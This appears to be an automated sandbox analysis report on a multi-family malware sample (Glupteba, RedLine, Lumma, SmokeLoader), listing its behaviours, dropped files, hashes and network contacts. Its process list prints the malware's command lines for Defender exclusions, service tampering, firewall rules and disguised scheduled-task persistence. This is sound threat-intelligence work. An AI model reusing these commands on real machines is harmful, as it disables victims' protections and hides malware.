Malware Analysis Report

2025-03-15 05:09

Sample ID 231211-la1ysacbc9
Target 0x00070000000146ff-113.dat
SHA256 fd3b5cae25f6e183b1d917bd9074662c7526ead9c307279d25cd979cd8805cb0
Tags
glupteba lumma redline smokeloader @oleh_ps livetraffic up3 backdoor dropper evasion infostealer loader stealer themida trojan upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

fd3b5cae25f6e183b1d917bd9074662c7526ead9c307279d25cd979cd8805cb0

Threat Level: Known bad

The file 0x00070000000146ff-113.dat was found to be: Known bad.

Malicious Activity Summary

glupteba lumma redline smokeloader @oleh_ps livetraffic up3 backdoor dropper evasion infostealer loader stealer themida trojan upx

Smokeloader family

Glupteba payload

RedLine payload

Lumma Stealer

Glupteba

RedLine

SmokeLoader

Detect Lumma Stealer payload V4

Modifies Windows Firewall

Stops running service(s)

Downloads MZ/PE file

Executes dropped EXE

Themida packer

Deletes itself

UPX packed file

Launches sc.exe

Program crash

Unsigned PE

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Suspicious use of SendNotifyMessage

Runs net.exe

Suspicious use of FindShellTrayWindow

Checks SCSI registry key(s)

Uses Task Scheduler COM API

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: MapViewOfSection

Creates scheduled task(s)

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-12-11 09:20

Signatures

Smokeloader family

smokeloader

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral2

Detonation Overview

Submitted

2023-12-11 09:20

Reported

2023-12-11 09:23

Platform

win10v2004-20231130-en

Max time kernel

137s

Max time network

147s

Command Line

"C:\Users\Admin\AppData\Local\Temp\0x00070000000146ff-113.exe"

Signatures

Detect Lumma Stealer payload V4

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Lumma Stealer

stealer lumma

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

SmokeLoader

trojan backdoor smokeloader

Downloads MZ/PE file

Modifies Windows Firewall

evasion

Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Stops running service(s)

evasion

Deletes itself

Description Indicator Process Target
N/A N/A N/A N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\9933.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\502F.exe N/A

Themida packer

themida

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

UPX packed file

upx

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\SysWOW64\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\0x00070000000146ff-113.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\0x00070000000146ff-113.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\0x00070000000146ff-113.exe N/A

Creates scheduled task(s)

persistence

Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\0x00070000000146ff-113.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0x00070000000146ff-113.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\0x00070000000146ff-113.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3260 wrote to memory of 3700 N/A N/A C:\Users\Admin\AppData\Local\Temp\9933.exe
PID 3260 wrote to memory of 3700 N/A N/A C:\Users\Admin\AppData\Local\Temp\9933.exe
PID 3260 wrote to memory of 3700 N/A N/A C:\Users\Admin\AppData\Local\Temp\9933.exe
PID 3260 wrote to memory of 3396 N/A N/A C:\Users\Admin\AppData\Local\Temp\502F.exe
PID 3260 wrote to memory of 3396 N/A N/A C:\Users\Admin\AppData\Local\Temp\502F.exe
PID 3260 wrote to memory of 3396 N/A N/A C:\Users\Admin\AppData\Local\Temp\502F.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\0x00070000000146ff-113.exe

"C:\Users\Admin\AppData\Local\Temp\0x00070000000146ff-113.exe"

C:\Users\Admin\AppData\Local\Temp\9933.exe

C:\Users\Admin\AppData\Local\Temp\9933.exe

C:\Users\Admin\AppData\Local\Temp\502F.exe

C:\Users\Admin\AppData\Local\Temp\502F.exe

C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe

"C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe"

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Users\Admin\AppData\Local\Temp\Broom.exe

C:\Users\Admin\AppData\Local\Temp\Broom.exe

C:\Users\Admin\AppData\Local\Temp\tuc3.exe

"C:\Users\Admin\AppData\Local\Temp\tuc3.exe"

C:\Users\Admin\AppData\Local\Temp\is-E9VN6.tmp\tuc3.tmp

"C:\Users\Admin\AppData\Local\Temp\is-E9VN6.tmp\tuc3.tmp" /SL5="$80034,8423542,54272,C:\Users\Admin\AppData\Local\Temp\tuc3.exe"

C:\Users\Admin\AppData\Local\Temp\latestX.exe

"C:\Users\Admin\AppData\Local\Temp\latestX.exe"

C:\Users\Admin\AppData\Local\Temp\5968.exe

C:\Users\Admin\AppData\Local\Temp\5968.exe

C:\Program Files (x86)\xrecode3\xrecode3.exe

"C:\Program Files (x86)\xrecode3\xrecode3.exe" -i

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\system32\schtasks.exe" /Query

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 helpmsg 1

C:\Program Files (x86)\xrecode3\xrecode3.exe

"C:\Program Files (x86)\xrecode3\xrecode3.exe" -s

C:\Windows\SysWOW64\net.exe

"C:\Windows\system32\net.exe" helpmsg 1

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 116 -ip 116

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 116 -s 328

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SYSTEM32\schtasks.exe

schtasks /delete /tn ScheduledUpdate /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\windefender.exe

C:\Windows\windefender.exe

C:\Windows\SysWOW64\sc.exe

sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\SysWOW64\cmd.exe

cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\windefender.exe

"C:\Windows\windefender.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\F192.bat" "

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FFEB.bat" "

C:\Users\Admin\AppData\Local\Temp\E63.exe

C:\Users\Admin\AppData\Local\Temp\E63.exe

C:\Users\Admin\AppData\Local\Temp\1D29.exe

C:\Users\Admin\AppData\Local\Temp\1D29.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 3164 -ip 3164

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3164 -s 608

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Users\Admin\AppData\Local\Temp\5707.exe

C:\Users\Admin\AppData\Local\Temp\5707.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 3.181.190.20.in-addr.arpa udp
US 8.8.8.8:53 158.240.127.40.in-addr.arpa udp
US 8.8.8.8:53 194.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.200:443 g.bing.com tcp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
US 8.8.8.8:53 9.228.82.20.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 146.78.124.51.in-addr.arpa udp
RU 81.19.131.34:80 81.19.131.34 tcp
US 8.8.8.8:53 34.131.19.81.in-addr.arpa udp
RU 185.172.128.19:80 185.172.128.19 tcp
US 8.8.8.8:53 19.128.172.185.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 217.135.221.88.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
MD 176.123.7.190:32927 tcp
US 8.8.8.8:53 190.7.123.176.in-addr.arpa udp
US 8.8.8.8:53 host-file-host6.com udp
US 8.8.8.8:53 127.27.251.142.in-addr.arpa udp
US 8.8.8.8:53 24.52.193.212.in-addr.arpa udp
RU 212.193.52.24:80 tcp
US 8.8.8.8:53 walkinglate.com udp
US 188.114.96.2:443 walkinglate.com tcp
BG 185.82.216.111:443 tcp
US 8.8.8.8:53 udp
BG 185.82.216.111:443 tcp
RU 212.193.52.24:80 host-host-file8.com tcp
RU 212.193.52.24:80 host-host-file8.com tcp
RU 212.193.52.24:80 host-host-file8.com tcp
RU 212.193.52.24:80 host-host-file8.com tcp
RU 212.193.52.24:80 host-host-file8.com tcp
RU 212.193.52.24:80 host-host-file8.com tcp
RU 212.193.52.24:80 host-host-file8.com tcp
RU 212.193.52.24:80 host-host-file8.com tcp
RU 212.193.52.24:80 tcp
US 8.8.8.8:53 udp
US 104.21.42.224:443 edarululoom.com tcp
RU 77.105.132.87:6731 tcp
RU 212.193.52.24:80 tcp
RU 212.193.52.24:80 tcp
RU 212.193.52.24:80 host-host-file8.com tcp
US 8.8.8.8:53 brusuax.com udp
AR 190.224.203.37:80 brusuax.com tcp
US 172.67.143.130:80 tcp
US 8.8.8.8:53 diagramfiremonkeyowwa.fun udp
US 8.8.8.8:53 75.181.67.172.in-addr.arpa udp
US 172.67.183.217:80 diagramfiremonkeyowwa.fun tcp
US 8.8.8.8:53 ratefacilityframw.fun udp
US 188.114.96.2:80 ratefacilityframw.fun tcp
US 8.8.8.8:53 reviveincapablewew.pw udp
US 8.8.8.8:53 181.174.67.172.in-addr.arpa udp
US 8.8.8.8:53 130.143.67.172.in-addr.arpa udp
US 38.47.221.193:34368 tcp
US 8.8.8.8:53 217.183.67.172.in-addr.arpa udp
US 8.8.8.8:53 cakecoldsplurgrewe.pw udp
US 8.8.8.8:53 opposesicknessopw.pw udp
US 8.8.8.8:53 politefrightenpowoa.pw udp
US 172.67.181.75:80 tcp
US 172.67.174.181:80 tcp
US 8.8.8.8:53 193.221.47.38.in-addr.arpa udp
US 162.159.135.233:443 tcp
US 8.8.8.8:53 xmr-eu1.nanopool.org udp
FR 51.15.193.130:14433 xmr-eu1.nanopool.org tcp

Files

memory/4964-0-0x0000000000400000-0x000000000040B000-memory.dmp

memory/3260-1-0x0000000002ED0000-0x0000000002EE6000-memory.dmp

memory/4964-3-0x0000000000400000-0x000000000040B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\9933.exe

MD5 f88edad62a7789c2c5d8047133da5fa7
SHA1 41b1f056cdda764a1c7c402c6fa4f8ab2f3ce5f9
SHA256 eb2b1ce5574096b91eb9e0482117d2518ab188c0747a209dc77e88d30bb970dc
SHA512 e2d5b0ace5dfd3bd2321b2a42b7e7725071ca440389dc5ef12720a34727ae84c2907cd7befeae5d53568d9deaee8443f4cbda44b598cfc9b6316d9389be09a60

C:\Users\Admin\AppData\Local\Temp\502F.exe

MD5 6988376473ea888909b4abbd324414c4
SHA1 9a3e5d782c5317c5ac5d1320e1d84b3b0944dd61
SHA256 1e0baeb32d1a7293c6ee10d957a053657cf02e6085ff256e422ab64bdf276e5f
SHA512 83a77fc0e607f7e8a92b64b37907bcf025c833db7e7ac8b49ec7cd292b9a36faf6135cf2e66fdb72d946ea5ad5d4b94f5848d616639cf752bf4a647a43a9f8ba

C:\Users\Admin\AppData\Local\Temp\502F.exe

MD5 82db150dc7c62b579396b17b5a2ec9b0
SHA1 7bdf2d4b50327042c0e3759bbfb81ce3ce77d582
SHA256 1583ab280b27fa61b31a774af4eab2d99218b1a52ebf171af41c74d6f8ae4a7d
SHA512 0bfbf201aac4e5ae03c69c2bab6424295be0906014cfd175b0fcb1625b4662ed6e81ee4c0288607e99640a84e4918a8f2cc9b0d19fee570b264d7d38e2024951

memory/3396-16-0x0000000074B60000-0x0000000075310000-memory.dmp

memory/3396-17-0x0000000000E70000-0x0000000002326000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe

MD5 4d23ef69120b8bb88916ab31493a3af5
SHA1 d2d604148959a45f60b81b07492c87a717986475
SHA256 06488ff17cddebfb4f56d9a0e98444e0a68a16ad10334806a79bdf4b6151967b
SHA512 704d9a9c43bc3b2d2662171bc084287b9c20b4d436097b215170f1e96ea9adc9df3001db9106a3f41fbee68f55ca4a8cc1f664afe9a7ee0be626afb66b52c909

C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe

MD5 a8a4513456393fdcd97eefd40c49271b
SHA1 eaee3b74af9553c3eb96fd4a1901fcaf5e571c0d
SHA256 89221deb947df9dc7bd1e84335058d7251df65de8d2a56cc44fd89842e94d50e
SHA512 7dc74bc192f0ef52db4ec540cf12fdd4b9f398680707d9053a9cc7be04fc6f96f790966bc552b5b941bf7bbce3c7d9152580e6a11d254b4c454ad873ac26a951

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 cde750f39f58f1ec80ef41ce2f4f1db9
SHA1 942ea40349b0e5af7583fd34f4d913398a9c3b96
SHA256 0a434be25f55f27ce0adbdfb08efeac1da01125b3e9194a94669bc7e9c6fe094
SHA512 c181faacbef70f8a91606943470af50cfd443958c48601051371ff5d9bf66bb9ec794571b05a347a7f5776f06484dc007f535591d2f5e1c57e3c0ee04f3e9580

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

MD5 ef03e3559ed103ae89ea34cbd14780a0
SHA1 37873b16197c28f8670e3f26f31280c06b1ec00c
SHA256 bca23968168d8c205ac2cc65d6f84072eede10e451c51f9afd79f75fcadd4f97
SHA512 9d27f8e855d0c9edae25c42190e9b0e287cee04e5eaa222faab3e4bc07b3ccd92ae18e9911536a1372037db95a6f9ea457e1a7264454a0a76a2a651072fd6670

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

MD5 398bb75bc6435923f6f01c2a59831802
SHA1 61dcc57683bed6d4fc973b9b94b6eadfe25b818f
SHA256 4e715fd8f1342affa85372d3238c2fd554905debbd0173beab49408cbeb44c10
SHA512 3879c24ef4a949c00f8155675e550f8fba20cb1e5397cf6887f98ce3a44d49b5af5de30f620c18a87b22c8a40f2d57674d05167c85550c53400c64b4fe5db492

C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe

MD5 06e7b7f2fc021294acb20ebe6825297b
SHA1 cee06fa6fc1d91c6d64a669326dcac0e284f3c63
SHA256 13ab1f7fb7272eda3988614e0bfd3a4e157ecb5f9f29026f949063c8668b0dcf
SHA512 40efbf825cc54a65d6ed595e4754c35c5d915ea2f0fdc27a8c664cb6a4e37acc5e1070908f0fb7ce8d6c5bdaca44bbaa1bd033580ef769b29fc04860577c8edd

C:\Users\Admin\AppData\Local\Temp\tuc3.exe

MD5 280675bd0abfffc9e229b0b6bb8347b1
SHA1 f33099885de4289c6cfec1643370e1511aa8f66c
SHA256 ff08af74e4556312408be4af25836da018d7c6914ba95059f9ed6f31c02a45a9
SHA512 d64378df930e721e1ccda950f84624de61178d2c656d03ec7f102af737e84043971c533894fa5e824b6059ec427f2f8f46bc35c1d2f6b8992a1d1fbc6dcd06d7

C:\Users\Admin\AppData\Local\Temp\tuc3.exe

MD5 dab3ba66e88da4f3054cadb9243f29dd
SHA1 52b86e953c068418c9312526b173c54fe4e8b3f7
SHA256 b9a8fd03026f8fae09191268f085d130f43bbb37603b1bd4e57497037d2301cd
SHA512 cdd2e956716364d4ef2ca77b90229582bf4d00cd42f116ab803aeec6d31e9b6b14162fe8e8498a720ff6aa6ecf8fd2994d70014ad9ebb6d33ed1b17bcf516aca

memory/2312-60-0x0000000000400000-0x0000000000414000-memory.dmp

memory/4712-62-0x0000000000B30000-0x0000000000B31000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tuc3.exe

MD5 5de4024c9568344eaf8b51106af43d4f
SHA1 d553b109e435a292fecc5910ed2a410eb8e04ca4
SHA256 a0d0b3b0001d3b287a695a78f078639651d88de3cd2f7dd95cd928178ecf00a8
SHA512 bcc32b311ac201f0f46098ec7bcb657b634a60a3f104fb462dbb0718294ddebd05af76ea233dcfb4a9cfefab434e673264d7608ae2337212f4f555be4a9d4bb0

C:\Users\Admin\AppData\Local\Temp\latestX.exe

MD5 0aaf09d0a08b397e13d2029eab0e3878
SHA1 bb96a1d3c6b146a4bf890b1c876df1e4d93a9558
SHA256 c4c5b2e42c190b51f35ecd990c2dec93ae8042d8699a43c1394ba8b70226c87a
SHA512 a8811e2c4d2c0c0cb324845339d3decd281db55f2450d393dbe01f9758dd5395b6276cb0997e29f651b320565b7691b80a2828a8a295cd7ff2576d3a6dd84df4

C:\Users\Admin\AppData\Local\Temp\is-E9VN6.tmp\tuc3.tmp

MD5 a0408bfb1eade46f6d40555bbc03e52d
SHA1 8081ab527becd3c62bfda07d1f651861d784f8dd
SHA256 2a52fe729797fd778011694da8ec2628b3a48a930d88cdba2e3ddf32b07e24d6
SHA512 7658be153229f0039f3c40d9d2891ce0707756099a42ccc52ba130e28a8e73fedf28ea1aeafec8d4fe9f3bb2d649cb463e87bfc3b9bf4b06d68c74c592d60d53

memory/3396-76-0x0000000074B60000-0x0000000075310000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-G7GVP.tmp\_isetup\_iscrypt.dll

MD5 a69559718ab506675e907fe49deb71e9
SHA1 bc8f404ffdb1960b50c12ff9413c893b56f2e36f
SHA256 2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc
SHA512 e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63

C:\Users\Admin\AppData\Local\Temp\is-G7GVP.tmp\_isetup\_isdecmp.dll

MD5 a813d18268affd4763dde940246dc7e5
SHA1 c7366e1fd925c17cc6068001bd38eaef5b42852f
SHA256 e19781aabe466dd8779cb9c8fa41bbb73375447066bb34e876cf388a6ed63c64
SHA512 b310ed4cd2e94381c00a6a370fcb7cc867ebe425d705b69caaaaffdafbab91f72d357966916053e72e68ecf712f2af7585500c58bb53ec3e1d539179fcb45fb4

C:\Users\Admin\AppData\Local\Temp\latestX.exe

MD5 1ff21aaa9f0defece1347d7a2f2e7e90
SHA1 c860f1c1623926f76d3e04f54a51a081ae28765d
SHA256 09c29bc4b55493f9dd7aaf464becf8c7b913d134da996dfb8a2804c36b0221ef
SHA512 57f429d8d4ee094238241427fc58c2572af963c003ce54eae7b1ac42abe64ab5e1377f1fc0de83f1b0bc706ee7e2787b06c1880ef4da4f92f800f814674dbd9d

C:\Users\Admin\AppData\Local\Temp\5968.exe

MD5 91d23595c11c7ee4424b6267aabf3600
SHA1 ef161bb8e90cebdf81f4e53dfccb50c1f90a9a02
SHA256 d58937d468f6ca92b12ee903a16a4908de340f64f894cf7f1c594cd15c0c7e47
